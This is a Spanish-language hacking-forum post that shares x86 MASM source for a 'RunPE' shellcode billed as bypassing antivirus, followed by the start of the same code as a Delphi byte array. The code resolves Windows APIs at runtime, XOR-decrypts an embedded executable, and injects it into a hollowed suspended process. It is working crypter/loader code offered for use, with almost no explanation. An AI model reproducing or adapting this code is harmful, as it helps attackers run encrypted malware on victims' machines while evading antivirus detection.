comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

RunPE NASM

  • 0 Respuestas
  • 1257 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ragaza

  • *
  • Underc0der
  • Mensajes: 49
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Abril 04, 2018, 06:01:24 am »
Código:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
.386
.model flat,stdcall
 
Comment *
 
[ RunPE ShellCode Bypass AV ] - {Private}
 
[ Coded By Coldzer0 _ AT4RE ] - [Delphi - MASM Coder]
 
[ 2010 - 2011 ]
 
[Skype : coldzer01 ] - [Yahoo : web.ghost@yahoo.com ]
 
[ Home : www.at4re.com  - www.mtcoders.com ]
 
{
Usage : [Delphi]
 
Make Var with
 
var
RunPE : procedure(Buffer:PChar;BufferLen:DWORD); stdcall;
 
#### then in code call it like this #########
 
 Begin
        RunPE := @ShellCode[1];
        RunPE(@TextFile[1],length(TextFile));
 end;
 
}
*
 
.code
 
start:
  PUSH EBP
  MOV EBP,ESP
  ADD ESP,-0378h
  PUSH EBX
  PUSH ESI
  PUSH EDI
 
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+28h] ; Get Module Path
 
;################# Extract Module Name [UNICODE] #################### 
  TEST EAX,EAX
AG: 
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,00h
  JE OK
  INC EAX
  INC EAX
  JMP AG
OK: 
  DEC EAX
  DEC EAX
  MOV CX,WORD PTR DS:[EAX]
  CMP CX,5Ch ; '\'
  JE OK2
  JMP OK
OK2: 
  INC EAX
  INC EAX 
;################# Extract Module Name #################### 


;################# Convert to UpperCase ####################
MOV CX,WORD PTR DS:[EAX]
CMP CX,61h                                     
JS CHK 
SUB EAX,2
XOR EDI,EDI
UP:
MOV CX,WORD PTR DS:[EAX]
INC EDI
CMP CX,39h
JS LO
SUB CX,20h
LO:
MOV WORD PTR DS:[EAX],CX
ADD EAX,2
CMP CX,0
JNE UP
SUB EAX,EDI
SUB EAX,EDI
;################# Convert to UpperCase ####################


;################# Check Module Name [Kernel32 [UNICODE]] ######################
CHK:
MOV CX,WORD PTR DS:[EAX]
CMP CX,4Bh                                      ; K
JNZ AV
MOV CX,WORD PTR DS:[EAX+2h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+4h]
CMP ECX,52h                                     ; R
JNZ AV
MOV CX,WORD PTR DS:[EAX+6h]
CMP ECX,4Eh                                     ; N
JNZ AV
MOV CX,WORD PTR DS:[EAX+8h]
CMP ECX,45h                                     ; E
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ah]     
CMP ECX,4Ch                                     ; L
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Ch]
CMP ECX,33h                                     ; 3
JNZ AV
MOV CX,WORD PTR DS:[EAX+0Eh]
CMP ECX,32h                                     ; 2
JNZ AV
;********* Normal Mode *******
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX+18h]
  JMP GO
;~~~~~~~~~~~ AV Mode ~~~~~~~~~~~
AV:
  ASSUME FS:NOTHING
  MOV EAX,DWORD PTR FS:[30h]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX+0Ch]
  MOV EAX,DWORD PTR DS:[EAX]
  MOV EAX,DWORD PTR DS:[EAX] ; First Module [AV]
  MOV EAX,DWORD PTR DS:[EAX] ; For AV [Kernel is Second Module]
  MOV EAX,DWORD PTR DS:[EAX+18h] 
;################# Check Module Name ######################
GO:     
  MOV DWORD PTR SS:[EBP-4h],EAX ; Save Kernel Base
  MOV BYTE PTR SS:[EBP-28h],47h
  MOV BYTE PTR SS:[EBP-27h],50h
  MOV BYTE PTR SS:[EBP-26h],41h
  XOR EAX,EAX
  MOV DWORD PTR SS:[EBP-14h],EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOV EDX,DWORD PTR DS:[EAX+78h]
  MOV DWORD PTR SS:[EBP-44h],EDX
  MOV EDX,DWORD PTR DS:[EAX+7Ch]
  MOV DWORD PTR SS:[EBP-40h],EDX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  ADD EAX,DWORD PTR SS:[EBP-44h]
  MOV ESI,DWORD PTR DS:[EAX+18h]
  DEC ESI
  TEST ESI,ESI
  JB LoadAPI
  INC ESI
  XOR EDX,EDX
LoopAPI:
  MOV ECX,DWORD PTR DS:[EAX+20h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  SHL EBX,2h
  ADD ECX,EBX
  MOV EDI,DWORD PTR DS:[ECX+0Ch]
  ADD EDI,DWORD PTR SS:[EBP-4h]
  MOV BL,BYTE PTR DS:[EDI]
  CMP BL,BYTE PTR SS:[EBP-28h]
  JNZ CheckAPI
  MOV BL,BYTE PTR DS:[EDI+3h]
  CMP BL,BYTE PTR SS:[EBP-27h]
  JNZ CheckAPI
  MOV CL,BYTE PTR DS:[EDI+7h]
  CMP CL,BYTE PTR SS:[EBP-26h]
  JNZ CheckAPI
  MOV ECX,DWORD PTR DS:[EAX+24h]
  ADD ECX,DWORD PTR SS:[EBP-4h]
  MOV EBX,EDX
  ADD EBX,EBX
  ADD ECX,EBX
  MOV CX,WORD PTR DS:[ECX]
  ADD CX,3h
  MOV EAX,DWORD PTR DS:[EAX+1Ch]
  ADD EAX,DWORD PTR SS:[EBP-4h]
  MOVZX ECX,CX
  SHL ECX,2h
  ADD EAX,ECX
  MOV ESI,DWORD PTR DS:[EAX]
  ADD ESI,DWORD PTR SS:[EBP-4h]
  MOV DWORD PTR SS:[EBP-14h],ESI
  JMP LoadAPI
CheckAPI:
  INC EDX
  DEC ESI
  JNZ LoopAPI
LoadAPI:                                                ; [ Write API To An Pointer - use later ]
  MOV BYTE PTR SS:[EBP-69h],47h 
  MOV BYTE PTR SS:[EBP-68h],65h
  MOV BYTE PTR SS:[EBP-67h],74h
  MOV BYTE PTR SS:[EBP-66h],4Dh
  MOV BYTE PTR SS:[EBP-65h],6Fh
  MOV BYTE PTR SS:[EBP-64h],64h
  MOV BYTE PTR SS:[EBP-63h],75h
  MOV BYTE PTR SS:[EBP-62h],6Ch
  MOV BYTE PTR SS:[EBP-61h],65h
  MOV BYTE PTR SS:[EBP-60h],48h
  MOV BYTE PTR SS:[EBP-5Fh],61h
  MOV BYTE PTR SS:[EBP-5Eh],6Eh
  MOV BYTE PTR SS:[EBP-5Dh],64h
  MOV BYTE PTR SS:[EBP-5Ch],6Ch
  MOV BYTE PTR SS:[EBP-5Bh],65h
  MOV BYTE PTR SS:[EBP-5Ah],41h
  MOV BYTE PTR SS:[EBP-59h],0h
  MOV BYTE PTR SS:[EBP-7Ch],47h
  MOV BYTE PTR SS:[EBP-7Bh],65h
  MOV BYTE PTR SS:[EBP-7Ah],74h
  MOV BYTE PTR SS:[EBP-79h],4Dh
  MOV BYTE PTR SS:[EBP-78h],6Fh
  MOV BYTE PTR SS:[EBP-77h],64h
  MOV BYTE PTR SS:[EBP-76h],75h
  MOV BYTE PTR SS:[EBP-75h],6Ch
  MOV BYTE PTR SS:[EBP-74h],65h
  MOV BYTE PTR SS:[EBP-73h],46h
  MOV BYTE PTR SS:[EBP-72h],69h
  MOV BYTE PTR SS:[EBP-71h],6Ch
  MOV BYTE PTR SS:[EBP-70h],65h
  MOV BYTE PTR SS:[EBP-6Fh],4Eh
  MOV BYTE PTR SS:[EBP-6Eh],61h
  MOV BYTE PTR SS:[EBP-6Dh],6Dh
  MOV BYTE PTR SS:[EBP-6Ch],65h
  MOV BYTE PTR SS:[EBP-6Bh],41h
  MOV BYTE PTR SS:[EBP-6Ah],0h
  MOV BYTE PTR SS:[EBP-91h],5Ah
  MOV BYTE PTR SS:[EBP-90h],77h
  MOV BYTE PTR SS:[EBP-8Fh],55h
  MOV BYTE PTR SS:[EBP-8Eh],6Eh
  MOV BYTE PTR SS:[EBP-8Dh],6Dh
  MOV BYTE PTR SS:[EBP-8Ch],61h
  MOV BYTE PTR SS:[EBP-8Bh],70h
  MOV BYTE PTR SS:[EBP-8Ah],56h
  MOV BYTE PTR SS:[EBP-89h],69h
  MOV BYTE PTR SS:[EBP-88h],65h
  MOV BYTE PTR SS:[EBP-87h],77h
  MOV BYTE PTR SS:[EBP-86h],4Fh
  MOV BYTE PTR SS:[EBP-85h],66h
  MOV BYTE PTR SS:[EBP-84h],53h
  MOV BYTE PTR SS:[EBP-83h],65h
  MOV BYTE PTR SS:[EBP-82h],63h
  MOV BYTE PTR SS:[EBP-81h],74h
  MOV BYTE PTR SS:[EBP-80h],69h
  MOV BYTE PTR SS:[EBP-7Fh],6Fh
  MOV BYTE PTR SS:[EBP-7Eh],6Eh
  MOV BYTE PTR SS:[EBP-7Dh],0h
  MOV BYTE PTR SS:[EBP-0A0h],56h
  MOV BYTE PTR SS:[EBP-9Fh],69h
  MOV BYTE PTR SS:[EBP-9Eh],72h
  MOV BYTE PTR SS:[EBP-9Dh],74h
  MOV BYTE PTR SS:[EBP-9Ch],75h
  MOV BYTE PTR SS:[EBP-9Bh],61h
  MOV BYTE PTR SS:[EBP-9Ah],6Ch
  MOV BYTE PTR SS:[EBP-99h],41h
  MOV BYTE PTR SS:[EBP-98h],6Ch
  MOV BYTE PTR SS:[EBP-97h],6Ch
  MOV BYTE PTR SS:[EBP-96h],6Fh
  MOV BYTE PTR SS:[EBP-95h],63h
  MOV BYTE PTR SS:[EBP-94h],45h
  MOV BYTE PTR SS:[EBP-93h],78h
  MOV BYTE PTR SS:[EBP-92h],0h
  MOV BYTE PTR SS:[EBP-0B1h],56h
  MOV BYTE PTR SS:[EBP-0B0h],69h
  MOV BYTE PTR SS:[EBP-0AFh],72h
  MOV BYTE PTR SS:[EBP-0AEh],74h
  MOV BYTE PTR SS:[EBP-0ADh],75h
  MOV BYTE PTR SS:[EBP-0ACh],61h
  MOV BYTE PTR SS:[EBP-0ABh],6Ch
  MOV BYTE PTR SS:[EBP-0AAh],50h
  MOV BYTE PTR SS:[EBP-0A9h],72h
  MOV BYTE PTR SS:[EBP-0A8h],6Fh
  MOV BYTE PTR SS:[EBP-0A7h],74h
  MOV BYTE PTR SS:[EBP-0A6h],65h
  MOV BYTE PTR SS:[EBP-0A5h],63h
  MOV BYTE PTR SS:[EBP-0A4h],74h
  MOV BYTE PTR SS:[EBP-0A3h],45h
  MOV BYTE PTR SS:[EBP-0A2h],78h
  MOV BYTE PTR SS:[EBP-0A1h],0h
  MOV BYTE PTR SS:[EBP-0C3h],52h
  MOV BYTE PTR SS:[EBP-0C2h],65h
  MOV BYTE PTR SS:[EBP-0C1h],61h
  MOV BYTE PTR SS:[EBP-0C0h],64h
  MOV BYTE PTR SS:[EBP-0BFh],50h
  MOV BYTE PTR SS:[EBP-0BEh],72h
  MOV BYTE PTR SS:[EBP-0BDh],6Fh
  MOV BYTE PTR SS:[EBP-0BCh],63h
  MOV BYTE PTR SS:[EBP-0BBh],65h
  MOV BYTE PTR SS:[EBP-0BAh],73h
  MOV BYTE PTR SS:[EBP-0B9h],73h
  MOV BYTE PTR SS:[EBP-0B8h],4Dh
  MOV BYTE PTR SS:[EBP-0B7h],65h
  MOV BYTE PTR SS:[EBP-0B6h],6Dh
  MOV BYTE PTR SS:[EBP-0B5h],6Fh
  MOV BYTE PTR SS:[EBP-0B4h],72h
  MOV BYTE PTR SS:[EBP-0B3h],79h
  MOV BYTE PTR SS:[EBP-0B2h],0h
  MOV BYTE PTR SS:[EBP-0D6h],57h
  MOV BYTE PTR SS:[EBP-0D5h],72h
  MOV BYTE PTR SS:[EBP-0D4h],69h
  MOV BYTE PTR SS:[EBP-0D3h],74h
  MOV BYTE PTR SS:[EBP-0D2h],65h
  MOV BYTE PTR SS:[EBP-0D1h],50h
  MOV BYTE PTR SS:[EBP-0D0h],72h
  MOV BYTE PTR SS:[EBP-0CFh],6Fh
  MOV BYTE PTR SS:[EBP-0CEh],63h
  MOV BYTE PTR SS:[EBP-0CDh],65h
  MOV BYTE PTR SS:[EBP-0CCh],73h
  MOV BYTE PTR SS:[EBP-0CBh],73h
  MOV BYTE PTR SS:[EBP-0CAh],4Dh
  MOV BYTE PTR SS:[EBP-0C9h],65h
  MOV BYTE PTR SS:[EBP-0C8h],6Dh
  MOV BYTE PTR SS:[EBP-0C7h],6Fh
  MOV BYTE PTR SS:[EBP-0C6h],72h
  MOV BYTE PTR SS:[EBP-0C5h],79h
  MOV BYTE PTR SS:[EBP-0C4h],0h
  MOV BYTE PTR SS:[EBP-0E7h],47h
  MOV BYTE PTR SS:[EBP-0E6h],65h
  MOV BYTE PTR SS:[EBP-0E5h],74h
  MOV BYTE PTR SS:[EBP-0E4h],54h
  MOV BYTE PTR SS:[EBP-0E3h],68h
  MOV BYTE PTR SS:[EBP-0E2h],72h
  MOV BYTE PTR SS:[EBP-0E1h],65h
  MOV BYTE PTR SS:[EBP-0E0h],61h
  MOV BYTE PTR SS:[EBP-0DFh],64h
  MOV BYTE PTR SS:[EBP-0DEh],43h
  MOV BYTE PTR SS:[EBP-0DDh],6Fh
  MOV BYTE PTR SS:[EBP-0DCh],6Eh
  MOV BYTE PTR SS:[EBP-0DBh],74h
  MOV BYTE PTR SS:[EBP-0DAh],65h
  MOV BYTE PTR SS:[EBP-0D9h],78h
  MOV BYTE PTR SS:[EBP-0D8h],74h
  MOV BYTE PTR SS:[EBP-0D7h],0h
  MOV BYTE PTR SS:[EBP-0F8h],53h
  MOV BYTE PTR SS:[EBP-0F7h],65h
  MOV BYTE PTR SS:[EBP-0F6h],74h
  MOV BYTE PTR SS:[EBP-0F5h],54h
  MOV BYTE PTR SS:[EBP-0F4h],68h
  MOV BYTE PTR SS:[EBP-0F3h],72h
  MOV BYTE PTR SS:[EBP-0F2h],65h
  MOV BYTE PTR SS:[EBP-0F1h],61h
  MOV BYTE PTR SS:[EBP-0F0h],64h
  MOV BYTE PTR SS:[EBP-0EFh],43h
  MOV BYTE PTR SS:[EBP-0EEh],6Fh
  MOV BYTE PTR SS:[EBP-0EDh],6Eh
  MOV BYTE PTR SS:[EBP-0ECh],74h
  MOV BYTE PTR SS:[EBP-0EBh],65h
  MOV BYTE PTR SS:[EBP-0EAh],78h
  MOV BYTE PTR SS:[EBP-0E9h],74h
  MOV BYTE PTR SS:[EBP-0E8h],0h
  MOV BYTE PTR SS:[EBP-0105h],52h
  MOV BYTE PTR SS:[EBP-0104h],65h
  MOV BYTE PTR SS:[EBP-0103h],73h
  MOV BYTE PTR SS:[EBP-0102h],75h
  MOV BYTE PTR SS:[EBP-0101h],6Dh
  MOV BYTE PTR SS:[EBP-0100h],65h
  MOV BYTE PTR SS:[EBP-0FFh],54h
  MOV BYTE PTR SS:[EBP-0FEh],68h
  MOV BYTE PTR SS:[EBP-0FDh],72h
  MOV BYTE PTR SS:[EBP-0FCh],65h
  MOV BYTE PTR SS:[EBP-0FBh],61h
  MOV BYTE PTR SS:[EBP-0FAh],64h
  MOV BYTE PTR SS:[EBP-0F9h],0h
  MOV BYTE PTR SS:[EBP-01Eh],6Eh
  MOV BYTE PTR SS:[EBP-01Dh],74h
  MOV BYTE PTR SS:[EBP-01Ch],64h
  MOV BYTE PTR SS:[EBP-01Bh],6Ch
  MOV BYTE PTR SS:[EBP-01Ah],6Ch
  MOV BYTE PTR SS:[EBP-019h],0h
  MOV BYTE PTR SS:[EBP-0114h],43h
  MOV BYTE PTR SS:[EBP-0113h],72h
  MOV BYTE PTR SS:[EBP-0112h],65h
  MOV BYTE PTR SS:[EBP-0111h],61h
  MOV BYTE PTR SS:[EBP-0110h],74h
  MOV BYTE PTR SS:[EBP-010Fh],65h
  MOV BYTE PTR SS:[EBP-010Eh],50h
  MOV BYTE PTR SS:[EBP-010Dh],72h
  MOV BYTE PTR SS:[EBP-010Ch],6Fh
  MOV BYTE PTR SS:[EBP-010Bh],63h
  MOV BYTE PTR SS:[EBP-010Ah],65h
  MOV BYTE PTR SS:[EBP-109h],73h
  MOV BYTE PTR SS:[EBP-108h],73h
  MOV BYTE PTR SS:[EBP-107h],41h
  MOV BYTE PTR SS:[EBP-0106h],0h
  MOV BYTE PTR SS:[EBP-121h],4Ch
  MOV BYTE PTR SS:[EBP-120h],6Fh
  MOV BYTE PTR SS:[EBP-11Fh],61h
  MOV BYTE PTR SS:[EBP-11Eh],64h
  MOV BYTE PTR SS:[EBP-11Dh],4Ch
  MOV BYTE PTR SS:[EBP-11Ch],69h
  MOV BYTE PTR SS:[EBP-11Bh],62h
  MOV BYTE PTR SS:[EBP-11Ah],72h
  MOV BYTE PTR SS:[EBP-119h],61h
  MOV BYTE PTR SS:[EBP-118h],72h
  MOV BYTE PTR SS:[EBP-117h],79h
  MOV BYTE PTR SS:[EBP-116h],41h
  MOV BYTE PTR SS:[EBP-115h],0h
  LEA EAX,DWORD PTR SS:[EBP-121h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-18h],EAX
  MOV ESI,DWORD PTR SS:[EBP+0Ch]
  DEC ESI
  TEST ESI,ESI
  JL CheckLen
  INC ESI
  XOR EBX,EBX
DeCryptPE:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV AL,BYTE PTR DS:[EAX+EBX]
  XOR AL,2Ah                                            ; XOR Key 1       [ You Can Change It But Should Crypt the File with the New Keys ]
  XOR AL,87h                                            ; XOR Key 2
  MOV EDX,DWORD PTR SS:[EBP+8h]
  MOV BYTE PTR DS:[EDX+EBX],AL
  INC EBX
  DEC ESI
  JNZ DeCryptPE
CheckLen:
  MOV EAX,DWORD PTR SS:[EBP+8h]
  MOV DWORD PTR SS:[EBP-54h],EAX
  LEA EAX,DWORD PTR SS:[EBP-69h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-7Ch]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV ESI,EAX
  PUSH 105
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0h
  CALL EBX
  PUSH EAX
  CALL ESI
  LEA EAX,DWORD PTR SS:[EBP-184h]
  MOV EBX,43h
GetS4C:
  MOV BYTE PTR DS:[EAX+EBX],0h
  DEC EBX
  CMP EBX,-1h
  JNZ GetS4C
  MOV DWORD PTR SS:[EBP-184h],44h
  LEA EAX,DWORD PTR SS:[EBP-114h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-184h]
  PUSH EAX
  PUSH 0h
  PUSH 0h
  PUSH 4h
  PUSH 0h
  PUSH 0h
  PUSH 0h
  LEA EAX,DWORD PTR SS:[EBP-375h]
  PUSH EAX
  PUSH 0
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0E7h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV DWORD PTR SS:[EBP-250h],10007h
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-0C3h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-30h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-91h]
  PUSH EAX
  LEA EAX,DWORD PTR SS:[EBP-1Eh]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-18h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  MOV EAX,DWORD PTR DS:[EAX+3Ch]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  MOV DWORD PTR SS:[EBP-2Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-0A0h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  PUSH 40h
  PUSH 3000h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+50h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL EBX
  MOV DWORD PTR SS:[EBP-38h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0D6h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-0Ch],EAX
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  LEA EDI,DWORD PTR DS:[EAX+18h]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX EAX,WORD PTR DS:[EAX+14h]
  ADD EDI,EAX
  LEA EAX,DWORD PTR SS:[EBP-0B1h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV DWORD PTR SS:[EBP-8h],EAX
  MOV DWORD PTR SS:[EBP-270h],1h
  MOV DWORD PTR SS:[EBP-26Ch],10h
  MOV DWORD PTR SS:[EBP-268h],2h
  MOV DWORD PTR SS:[EBP-264h],20h
  MOV DWORD PTR SS:[EBP-260h],4h
  MOV DWORD PTR SS:[EBP-25Ch],40h
  MOV DWORD PTR SS:[EBP-258h],4h
  MOV DWORD PTR SS:[EBP-254h],40h
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOVZX ESI,WORD PTR DS:[EAX+6h]
  DEC ESI
  TEST ESI,ESI
  JL CheckReadP
  INC ESI
  XOR EBX,EBX
ReadRPLoop:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+10h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+14h]
  ADD EAX,DWORD PTR SS:[EBP-54h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  LEA EAX,DWORD PTR SS:[EBP-3Ch]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+24h]
  SHR EAX,1Dh
  MOV EAX,DWORD PTR SS:[EBP+EAX*4h-270h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+8h]
  PUSH EAX
  LEA EAX,DWORD PTR DS:[EBX+EBX*4h]
  MOV EAX,DWORD PTR DS:[EDI+EAX*8h+0Ch]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-8h]
  INC EBX
  DEC ESI
  JNZ ReadRPLoop
CheckReadP:
  LEA EAX,DWORD PTR SS:[EBP-34h]
  PUSH EAX
  PUSH 4h
  LEA EAX,DWORD PTR SS:[EBP-38h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-1ACh]
  ADD EAX,8h
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-140h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-0Ch]
  MOV EAX,DWORD PTR SS:[EBP-2Ch]
  MOV EAX,DWORD PTR DS:[EAX+28h]
  ADD EAX,DWORD PTR SS:[EBP-38h]
  MOV DWORD PTR SS:[EBP-1A0h],EAX
  LEA EAX,DWORD PTR SS:[EBP-0F8h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  LEA EAX,DWORD PTR SS:[EBP-250h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  LEA EAX,DWORD PTR SS:[EBP-105h]
  PUSH EAX
  MOV EAX,DWORD PTR SS:[EBP-4h]
  PUSH EAX
  CALL DWORD PTR SS:[EBP-14h]
  MOV EBX,EAX
  MOV EAX,DWORD PTR SS:[EBP-13Ch]
  PUSH EAX
  CALL EBX
  POP EDI
  POP ESI
  POP EBX
  MOV ESP,EBP
  POP EBP
  RETN 8h
end start

Código en shellcode:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
NewRunPE {Bypass AV} : array [0..2376] of Byte =
(
$55,$8B,$EC,$81,$C4,$88,$FC,$FF,$FF,$53,$56,$57,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,
$00,$8B,$00,$8B,$40,$28,$85,$C0,$66,$8B,$08,$66,$83,$F9,$00,$74,$04,$40,$40,$EB,$F3,$48,$48,$66,$8B,
$08,$66,$83,$F9,$5C,$74,$02,$EB,$F3,$40,$40,$66,$8B,$08,$66,$83,$F9,$4B,$75,$54,$66,$8B,$48,$02,$83,
$F9,$45,$75,$4B,$66,$8B,$48,$04,$83,$F9,$52,$75,$42,$66,$8B,$48,$06,$83,$F9,$4E,$75,$39,$66,$8B,$48,
$08,$83,$F9,$45,$75,$30,$66,$8B,$48,$0A,$83,$F9,$4C,$75,$27,$66,$8B,$48,$0C,$83,$F9,$33,$75,$1E,$66,
$8B,$48,$0E,$83,$F9,$32,$75,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,
$40,$18,$EB,$15,$64,$A1,$30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$00,$8B,$40,$18,
$89,$45,$FC,$C6,$45,$D8,$47,$C6,$45,$D9,$50,$C6,$45,$DA,$41,$33,$C0,$89,$45,$EC,$8B,$45,$FC,$8B,$40,
$3C,$03,$45,$FC,$8B,$50,$78,$89,$55,$BC,$8B,$50,$7C,$89,$55,$C0,$8B,$45,$FC,$03,$45,$BC,$8B,$70,$18,
$4E,$85,$F6,$72,$5C,$46,$33,$D2,$8B,$48,$20,$03,$4D,$FC,$8B,$DA,$C1,$E3,$02,$03,$CB,$8B,$79,$0C,$03,
$7D,$FC,$8A,$1F,$3A,$5D,$D8,$75,$3B,$8A,$5F,$03,$3A,$5D,$D9,$75,$33,$8A,$4F,$07,$3A,$4D,$DA,$75,$2B,
$8B,$48,$24,$03,$4D,$FC,$8B,$DA,$03,$DB,$03,$CB,$66,$8B,$09,$66,$83,$C1,$03,$8B,$40,$1C,$03,$45,$FC,
$0F,$B7,$C9,$C1,$E1,$02,$03,$C1,$8B,$30,$03,$75,$FC,$89,$75,$EC,$EB,$04,$42,$4E,$75,$A7,$C6,$45,$97,
$47,$C6,$45,$98,$65,$C6,$45,$99,$74,$C6,$45,$9A,$4D,$C6,$45,$9B,$6F,$C6,$45,$9C,$64,$C6,$45,$9D,$75,
$C6,$45,$9E,$6C,$C6,$45,$9F,$65,$C6,$45,$A0,$48,$C6,$45,$A1,$61,$C6,$45,$A2,$6E,$C6,$45,$A3,$64,$C6,
